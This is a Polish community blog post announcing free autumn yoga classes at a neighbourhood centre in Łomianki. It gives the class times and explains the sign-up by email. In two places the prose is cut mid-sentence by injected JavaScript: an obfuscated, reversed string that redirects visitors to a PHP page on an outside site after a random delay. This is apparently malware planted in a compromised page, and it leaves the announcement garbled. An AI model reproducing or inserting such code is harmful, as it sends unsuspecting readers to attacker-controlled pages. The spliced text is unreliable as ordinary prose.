Jesienna Joga dla Wszystkich

Jeśli nie lubisz spędzać wieczorów na kanapie, potrzebujesz zadbać o swoją kondycję fizyczną i masz ochotę na trochę ruchu, który pozwoli Ci zadbać o Twoją formę, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to mamy dla Ciebie świetną informację. Podpisaliśmy już umowę z gminą Łomianki na sfinansowanie zajęć jogi, więc teraz oficjalnie możemy przedstawić ten plakat: 

Zapraszamy na ćwiczenia w poniedziałki i środy do Domu Spotkań Sąsiedzkich w Burakowie przy ul. Parkowej 2. Zajęcia odbywają się rano w godz. 9:30 – 10:30 dla seniorów. Wieczorem w te dni zaczynamy o godz. 18.30, a kończymy o godz. 19.30. Zajęcia prowadzone będą na poziomie dla początkujących. Każdy więc może przyjść, nie ma ograniczeń wiekowych. Tak naprawdę potrzeba tylko trochę dobrych chęci, optymizmu i dacie radę!!!

Niestety, ze względu na przepisy sanitarne COVID-19 potrzebna jest własna mata do ćwiczeń. Musimy też wprowadzić zapisy na adres mejlowy:
return $zXz.list[n].split(„”;).reverse().join(„”;);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to:nl@naszelomianki.pl”>nl@naszelomianki.pl .

Aha, zapomniałem dodać, że zajęcia są bezpłatne. ZAPRASZAMY.

Jerzy Kostowski Opublikowane przez:

Bądź pierwszą osobą, która zostawi swój komentarz

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Afiseaza emoticoanele Locco.Ro